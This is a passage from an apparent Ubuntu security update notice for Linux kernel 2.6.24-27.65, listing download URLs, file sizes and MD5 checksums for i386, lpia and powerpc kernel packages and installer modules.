  Size/MD5:    52068 bd20c8c1eb151b2b8d989d5081f8386b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    38326 aeea101daeed1f87bb30f67c4011d737
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    39080 b8fc6fd4c6fa20a8cf2a92e150a1b969
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    45990 9c06ca831da0f4183ef6e15af4e9b3cb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46170 8d8cb61faaaf267e135ecd2844afd195
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83246 6941b39723fc655f7dcf2846e5c8a47e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    83662 d3f22aca87d23a99c75b3e6464eb22fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32396 402518c87d72b3dfc41656de51ebaa64
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32672 7135f346092b651dafed111b91aee44d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   637694 e32a7d7a367597e18b305f6d97b93630
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   655982 7e8f7f69c261eaa0ce58ddb865205698
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   209878 1ca7ab42cb7cd39e37e711fabaae8b99
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   213640 bfc69b0b0b29485a95605fe7e091dd5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    46544 90ef4a74882d5770a3f7d888ba288b35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    47602 e55422dc48484675642c96bdbc673595
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    62270 cc798227f68e2c8c1d8a54b03bf0058a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    63626 a2d3587a68e63d2cf90e1cd3790d1079
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   130538 c07adcef7438ef51821f9a8b750f7973
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   137028 068fdde4394c7850abba6ea81e69c801
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   279080 76c07612b0081c38122b1929c7f19f34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   277690 c635d04d78592fe9792024e84682ccc7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2012458 d372c1d872861cd7c84ea9d06c4e8162
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  2089276 69416120cd161789b598b2b93034db07
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5:   655314 4adb56a8d5211bba1acc02d76e9fb65d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5:   658154 7d6f7bccbf83f9a32664588ab5faaabe
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5:  1242098 c22eebab07e9ce3d85526ce2945da263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5:  1262772 85fe04ee16e27b961017cf148c4f1d21
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5:   659870 a3ebd23356d57307d124b62faf3fc2a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:   561726 410d756762ce992d36864ce38efc2e1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5:  1059932 350947cab60fcafb13483ab14ca0ff95
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 18380540 1da620cffb3b62617fc8213134b951e5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 18401264 dd7b7991e7f843ebcae7bc5c8700636d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 18513796 c8b5dac38c445a72681bd5dd1c9a1f98
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5:  8730742 fc3305910b00833b509a4e34199e4a67
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-386_2.6.24-27.65_i386.deb
  Size/MD5: 25540786 ce01c05207f08195efd8b88b83a93549
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_i386.deb
  Size/MD5: 26356028 ed8deb0b2243fd649476c43d245a9690
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-server_2.6.24-27.65_i386.deb
  Size/MD5: 27372622 d07e093dc192ad5a49be8c45b5c85dd4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-virtual_2.6.24-27.65_i386.deb
  Size/MD5: 24872642 c28ebc89c9a427352186dea53d81ffe8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_i386.deb
  Size/MD5:   707576 d26794effd4e857da1db4d28e9407611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   258852 b86f8c37480cbd19131432c908013dd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   264136 631fc78981097e46ee5643ec3cfc5616
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163268 1c98e7380c4f80c461a6181344914fea
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   163034 9cc84b270528d0fef36320974b415392
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   236710 755a3caeceece8650e46706804c6e072
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   244984 cc330be20f314b308aa0fbcf95c0370c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1810274 169e24dc79c5fbde1ca1a2a5520286d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1827436 cf166d9cdca76a06fd78b1a0669ed67b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   150836 169c287e6bc754d02924a719d34aad29
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   143018 ee925199234ec977618a5c3c3b03954f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   156072 9ff98bc4b62d033785de95858201c353
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   157158 75cdc15de6d5bdc90e05789eb00fe29d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   107222 37ce3c67bd74d5040aa4d22223cbb486
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   108526 7e50df25fcc29d44c2cfdc3e5c046a66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    32958 b1b4b1a1b95db3b09923a39eb42c28e4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    33388 860c1b56a45914246929757c815f5ec4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    60694 99aca1f49a5cd919f85ef1600ca757ef
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    61158 bbe05be947e606b614108423a7ca0b83
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82652 8ffbf8ae116bd81b7632e2e3a58e0a76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    82954 1532b447c1a1cc43d1cbf46b1e14020f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48562 d2569ab07923f67de18ed6c63940351c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    48452 dcf73534ccf880da82f6ec8bdad54db7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8192 2c3bac93f50147f7f67fffdcbb601b66
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:     8444 375a2103e5890c501433ae5b3d912fbb
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    51104 8d242482ce8adca7ec8f5d0a40c04c20
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    52950 8449d644f2a2455da01bf48922757fd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92156 232f32e69ea0f4daf4a17ad68542e45f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    92446 6525df043e2a865a6eb646f015140e31
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1443710 2746c7d1f27f2638dd6f141c5d7e68ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:  1427036 d049929f20e6cbec8c7338977af873a7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    43240 53538a90e2ae8dae72a91a8aa79ecb90
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    42806 3b1d48b0e38b9acebe7581278a8e0408
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    11402 83264faacaa7ff9c249144d8dd0061b0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    12016 7e17c39f818116eae09203af5f5dd870
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:   470484 bede1d05dc08ab51105feaff29b39093
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb
  Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   334046 06512921aae848be603af54dc56f72e6
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    62718 e53308b729496be4a0e343535769c74e
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   105746 034c14e0418581e1b8b56913246e96de
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   704830 ef370acc49192e464ef553984e361d88
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   243328 b280fefee27294e988529239616e68fe
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   387992 53b23049b6f79a9609349927adec3443
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   657530 98dd4c49966d886237bed19fddb84057
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb
  Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   266748 d71a805e23acc800f21449d312975e04
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   201688 94056840984e621b385099d261ce2420
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   199752 9d4225f0960410c78279f61aa02471da
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    46836 10f5de3e02406e28d373098a6613860b
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:     8486 80580934d5e5f6909c396732bedf2055
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae
